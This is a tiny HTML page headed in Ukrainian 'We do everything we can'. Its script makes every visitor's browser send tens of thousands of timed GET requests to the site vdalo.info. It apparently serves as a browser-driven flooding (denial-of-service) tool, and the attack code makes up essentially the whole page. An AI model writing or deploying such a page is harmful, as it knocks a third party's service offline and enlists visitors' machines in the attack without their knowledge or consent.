<html>
<title>ne vdalo</title>
<meta charset="utf-8">
<body>
<h1>Ми робим все, що можем</h1>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script>
	data = {};
	var i;
	for(i=1; i<99999; i++) {
		setTimeout(function() {
			jQuery.get("https://vdalo.info/", data, function(response) {
				console.log(response)
			});
		}, i*100);
	}
</script>
</body>
</html>